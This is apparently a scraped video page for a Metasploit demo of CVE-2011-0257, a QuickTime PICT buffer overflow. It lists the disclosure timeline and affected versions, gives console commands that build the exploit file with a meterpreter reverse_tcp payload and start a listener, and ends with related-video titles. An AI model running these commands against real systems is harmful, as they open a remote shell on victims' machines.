CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow

preview_player
Показать описание

Timeline :
Vulnerability discovered by Matt "j00ru" Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-11
Coordinated public release of the vulnerability the 2011-08-08
Metasploit PoC provided the 2011-09-03

PoC provided by:
MC

Reference(s) :
CVE-2011-0257
ZDI-11-252

Affected versions :
All Apple QuickTime Player previous to version 7.7

Tested on Windows XP Pro SP3 with Apple QuickTime Player 7.6 (472)

Description :
This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Metasploit demo :

use exploit/windows/fileformat/apple_quicktime_pnsize
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo
  1. Eric Romang (wow)
  2. metasploit
  3. quicktime
  4. mac
  5. apple
  6. hack
Рекомендации по теме
CVE-2011-0257 : Apple 0:02:00

CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow

CVE 2011-0257 Apple 0:02:01

CVE 2011-0257 Apple QuickTime PICT PnSize Buffer Overflow

CVE-2012-3752 Apple QuickTime 0:02:37

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Apple Quicktime Client 0:04:21

Apple Quicktime Client Side Exploit (0day)

Metasploit Quicktime 7 0:09:06

Metasploit Quicktime 7 6 7

mozilla_mchannel exploit Firefox 0:01:35

mozilla_mchannel exploit Firefox

CVE-2011-2595 ACDSee FotoSlate 0:02:19

CVE-2011-2595 ACDSee FotoSlate PLP File id Parameter Overflow Metasploit Demo

Demo Screen Recording 0:00:45

Demo Screen Recording Using QuickTime

McAfee: Demonstrating Solidcores 0:04:03

McAfee: Demonstrating Solidcores prevention of the Metasploit Aurora plugin

MS10-087 : Microsoft 0:04:39

MS10-087 : Microsoft Office RTF Parsing Stack Overflow

PICT Formats and 0:02:37

PICT Formats and Therapy Duration

Metasploit Mac OS 0:05:42

Metasploit Mac OS X Post Exploitation : Enumeration and Hash Dump

MS10-026 : Microsoft 0:01:34

MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow

Buffer Overflow Exploitation 0:17:27

Buffer Overflow Exploitation of TugZip using Metasploit (Hacker Vision - 07)

Tomcat t 0:08:17

Tomcat t

DVD X Player 0:32:26

DVD X Player 5.5 Professional - '.PLF' File Buffer Overflow via SEH

CVE-2016-3115 OpenSSH forced-command 0:03:54

CVE-2016-3115 OpenSSH forced-command and security bypass

Комментарии
Автор

you've got to hand it to apple, they make stuff easy

lars